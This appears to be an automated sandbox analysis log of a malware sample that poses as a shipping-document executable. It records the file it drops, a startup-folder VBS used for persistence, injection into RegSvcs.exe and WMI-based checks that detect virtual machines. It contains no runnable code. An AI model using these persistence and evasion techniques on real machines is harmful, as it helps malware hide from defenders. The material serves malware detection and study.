Source: 5.2.RegSvcs.exe.2cbff86.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.RegSvcs.exe.3fe6458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_0069E01E LoadLibraryA,GetProcAddress,

0_2_0069E01E

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006A6B05 push ecx; ret	0_2_006A6B18
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D96B05 push ecx; ret	2_2_00D96B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C40C push cs; iretd	5_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00423149 push eax; ret	5_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C50E push cs; iretd	5_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004231C8 push eax; ret	5_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0040E21D push ecx; ret	5_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C6BE push ebx; ret	5_2_0041C6BF

Source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yGItGSIT6n4pY', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yGItGSIT6n4pY', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yGItGSIT6n4pY', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.RegSvcs.exe.2cbff86.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yGItGSIT6n4pY', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.RegSvcs.exe.3fe6458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yGItGSIT6n4pY', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	File created: \mvv aliado - s-req-19-00064 40ft 1x20.exe
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	File created: \mvv aliado - s-req-19-00064 40ft 1x20.exe			Jump to behavior

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

File created: C:\Users\user\AppData\Local\cyclop\juvenile.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Jump to behavior

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_006E8111
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_0069EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0069EB42
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DD8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00DD8111
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D8EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_00D8EB42

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_006A123A

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	API/Special instruction interceptor: Address: 121A88C
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	API/Special instruction interceptor: Address: 110E124
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	API/Special instruction interceptor: Address: 16223B4
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	API/Special instruction interceptor: Address: 16013B4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

5_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1990	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7822	Jump to behavior

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Evaded block: after key decision			graph_0-93593
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Evaded block: after key decision

Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-94226

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	API coverage: 4.6 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_006C6CA9
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_006C60DD
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_006C63F9
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006CEB60
